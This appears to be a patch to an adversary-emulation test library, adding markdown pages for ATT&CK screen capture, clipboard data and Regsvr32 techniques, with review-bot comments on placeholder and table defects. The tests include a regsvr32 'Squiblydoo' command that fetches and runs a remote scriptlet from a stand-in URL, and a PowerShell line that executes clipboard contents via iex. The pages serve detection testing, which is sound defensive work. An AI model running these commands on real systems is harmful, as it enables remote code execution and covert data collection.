Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. + +===Mac=== + +On OSX, the native command screencapture is used to capture screenshots. + +===Linux=== + +On Linux, there is the native command xwd. (Citation: Antiquated Mac Malware) + +Detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment. + +Platforms: Linux, macOS, Windows + +Data Sources: API monitoring, Process monitoring, File monitoring
+ +## Atomic Tests + +- [Atomic Test #1 - Screencapture](#atomic-test-1---screencapture) + +- [Atomic Test #2 - Screencapture (silent)](#atomic-test-2---screencapture-silent) + +- [Atomic Test #3 - X Windows Capture](#atomic-test-3---x-windows-capture) + +- [Atomic Test #4 - Import](#atomic-test-4---import) + + +
+ +## Atomic Test #1 - Screencapture +Use screencapture command to collect a full desktop screenshot + +**Supported Platforms:** macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | xxx + | Path | desktop.png| + +#### Run it with `bash`! +``` +screencapture +``` +
+
+ +## Atomic Test #2 - Screencapture (silent) +Use screencapture command to collect a full desktop screenshot + +**Supported Platforms:** macos + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | xxx + | Path | desktop.png| + +#### Run it with `bash`! +``` +screencapture -x +``` +
+
+ +## Atomic Test #3 - X Windows Capture +Use xwd command to collect a full desktop screenshot and review file with xwud + +**Supported Platforms:** linux + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | xxx + | Path | desktop.xwd| + +#### Run it with `bash`! +``` +xwd -root -out #{output_file} +xwud -in #{output_file} + +``` +
+
+ +## Atomic Test #4 - Import +Use import command to collect a full desktop screenshot + +**Supported Platforms:** linux + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | output_file | xxx + | Path | desktop.png| + +#### Run it with `bash`! +``` +import -window root +``` +
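Review bot: Tests #1, #2 and #4 in atomics/t1113/t1113.md declare an `output_file` input (default `desktop.png`) but never use `#{output_file}` in the command: `screencapture` and `screencapture -x` are run with no file argument and `import -window root` has no output filename, so none of them writes the screenshot the description promises. Test #3 is the only one that uses `#{output_file}` consistently. In every Inputs table the `output_file` row is broken across two lines (`| output_file | xxx` and then `| Path | desktop.png|`), the description is the placeholder `xxx`, and the separator row has a single cell under a four-column header, so the tables will not render; each row should be one line with a real description.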
diff --git a/atomics/t1115/t1115.md b/atomics/t1115/t1115.md new file mode 100644 index 00000000..5ec42317 --- /dev/null +++ b/atomics/t1115/t1115.md @@ -0,0 +1,54 @@ +# T1115 - Clipboard Data +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115) +
Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. + +===Windows=== + +Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard) + +===Mac=== + +OSX provides a native command, pbpaste, to grab clipboard contents (Citation: Operating with EmPyre). + +Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity. + +Platforms: Linux, macOS, Windows + +Data Sources: API monitoring
+ +## Atomic Tests + +- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from) + +- [Atomic Test #2 - PowerShell](#atomic-test-2---powershell) + + +
+ +## Atomic Test #1 - Utilize Clipboard to store or execute commands from +Add data to clipboard to copy off or execute commands from. + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +dir | clip +clip < readme.txt + +``` +
+
+ +## Atomic Test #2 - PowerShell +Utilize PowerShell to echo a command to clipboard and execute it + +**Supported Platforms:** windows + + +#### Run it with `powershell`! +``` +echo Get-Process | clip +Get-Clipboard | iex +``` +
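Review bot: Atomic Test #1 in atomics/t1115/t1115.md runs `clip < readme.txt`, which assumes a `readme.txt` in the current directory and otherwise fails with "The system cannot find the file specified"; make the file an input with a default, or create it in the test. Test #2 is titled just "PowerShell", which does not say what it does, and `Get-Clipboard` only exists from Windows PowerShell 5.0 onward, so the supported platform should be qualified with that version. Neither test has a `#### Inputs` section.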
diff --git a/atomics/t1117/t1117.md b/atomics/t1117/t1117.md new file mode 100644 index 00000000..a2c98d78 --- /dev/null +++ b/atomics/t1117/t1117.md @@ -0,0 +1,90 @@ +# T1117 - Regsvr32 +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1117) +
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32) + +Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary. + +Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) + +Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016) + +Detection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. 
(Citation: Carbon Black Squiblydoo Apr 2016) + +Platforms: Windows + +Data Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry + +Defense Bypassed: Process whitelisting, Anti-virus + +Permissions Required: User, Administrator + +Remote Support: No + +Contributors: Casey Smith
+ +## Atomic Tests + +- [Atomic Test #1 - Regsvr32 local COM scriptlet execution](#atomic-test-1---regsvr32-local-com-scriptlet-execution) + +- [Atomic Test #2 - Regsvr32 remote COM scriptlet execution](#atomic-test-2---regsvr32-remote-com-scriptlet-execution) + +- [Atomic Test #3 - Regsvr32 local DLL execution](#atomic-test-3---regsvr32-local-dll-execution) + + +
+ +## Atomic Test #1 - Regsvr32 local COM scriptlet execution +Regsvr32.exe is a command-line program used to register and unregister OLE controls + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | filename | Name of the local file, include path. | Path | Regsvr32.sct| + +#### Run it with `command_prompt`! +``` +regsvr32.exe /s /u /i:#(unknown) scrobj.dll + +``` +
+
+ +## Atomic Test #2 - Regsvr32 remote COM scriptlet execution +Regsvr32.exe is a command-line program used to register and unregister OLE controls + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | url | URL to hosted sct file | Url | http://www.example.com/file.sct| + +#### Run it with `command_prompt`! +``` +regsvr32.exe /s /u /i:#{url} scrobj.dll + +``` +
+
+ +## Atomic Test #3 - Regsvr32 local DLL execution +Regsvr32.exe is a command-line program used to register and unregister OLE controls + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | payload.dll| + +#### Run it with `command_prompt`! +``` +regsvr32.exe {dll_name} + +``` +
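Review bot: the Atomic Test #1 command `regsvr32.exe /s /u /i:#(unknown) scrobj.dll` never references the test's only declared input, `filename`, so the value in the Inputs table is never substituted; it should read `/i:#{filename}` to match the `#{url}` form used in Atomic Test #2. Atomic Test #3 has the mirror-image defect: `regsvr32.exe {dll_name}` is missing the `#` prefix of the `#{...}` placeholder syntax, so `dll_name` is not substituted either. Also, each Inputs table's separator row `|-------------------------------------------|` is a single cell under a four-column header, so Markdown will not render these as tables; use one `|---|` cell per column and drop the leading space before the data row. Finally, all three tests reuse the generic description "Regsvr32.exe is a command-line program used to register and unregister OLE controls", which does not say what distinguishes each test (local scriptlet, remote scriptlet, local DLL) or what a defender running it should expect to observe in process and command-line logs; a one-line, test-specific description would make the file match the Detection guidance at the top.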
diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md index 40228136..0463f1d0 100644 --- a/atomics/t1123/t1123.md +++ b/atomics/t1123/t1123.md @@ -52,6 +52,5 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} #### Run it with `command_prompt`! ``` powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet - ```
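Review bot: this removes the trailing blank line inside the t1123 command fence, but the three new fences added to t1117.md in this same patch each still carry the same blank line before the closing ``` ; apply the identical cleanup there so the new file does not need a follow-up whitespace commit.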